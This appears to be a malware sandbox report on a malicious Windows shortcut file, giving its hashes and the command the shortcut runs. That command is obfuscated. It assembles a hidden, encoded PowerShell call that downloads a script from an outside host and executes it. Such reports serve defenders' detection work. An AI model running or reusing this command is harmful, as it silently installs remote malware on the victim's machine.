Malicious

fa628b4e8ede52829310f8806c37e5c2

LNK File | MD5: fa628b4e8ede52829310f8806c37e5c2 | Size: 1.04 KB | application/x-ms-shortcut

Characteristics
MD5: fa628b4e8ede52829310f8806c37e5c2
SHA1: f6888f9c96b7d459f3b40d8cb96e5bd85aed727d
SHA256: d59a80e71d93bc9f90f32fdd1cce849eab5764c5ca379807382dea76a6753155
SHA384: 1e7512514dfe263d1610a5cd6781f24a976756f9e34256ee6910f85a1d32cafb90bb54fb5b21b5f576b3a82a7db8346d
SHA512: 915e6ff6739495b3fc03bbc76c7642dba5bd059a2d460a90937e16a3f380f12e504d0197982830a7d165de9250e36c5913ae2bcaf8f6eb97c1128fa3f0cdc887
SSDeep: 24:8q3iejkj+8w5GpJQnDB31IdHuOTQ0OKh3rT06yIthfVRH9OMdei2e:8qyWkPpJyI5x797ci2e
TLSH: 9A11259E16B884A2C1ED65730517F723F3BD2633E64C17952004B584CCE06645B2F874
File Structure
Artefacts
Name: LNK: Command Execution
Value:

cmd.exe /WMRX:F0E /WFXI:BNYE5S /D/C "for %R in ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AC") do for %Y in (ers) do for %N in (xe) do for %o in ("kALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABh") do for %T in (pow) do for %I in (-) do for %K in (w) do for %Q in (nc) do for %P in ("AG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBaAE4AdwBsAGsAcQ") do for %U in (-e) do for %m in (hell) do for %p in ("BBADcANwAyADkAUABNAEQARgBkADIAUwBoAHoAVQBaAGkAZwBoAE0AcgBRAHMATgBRAFEAJwApAA==") do for %l in (hid) do for %L in (.e) do %T%Y%m%L%N %I%K %l %U%Q %~R%~o%~P%~p"

fa628b4e8ede52829310f8806c37e5c2 (1.04 KB)
File Structure
Characteristics
No malware configuration was found at this point.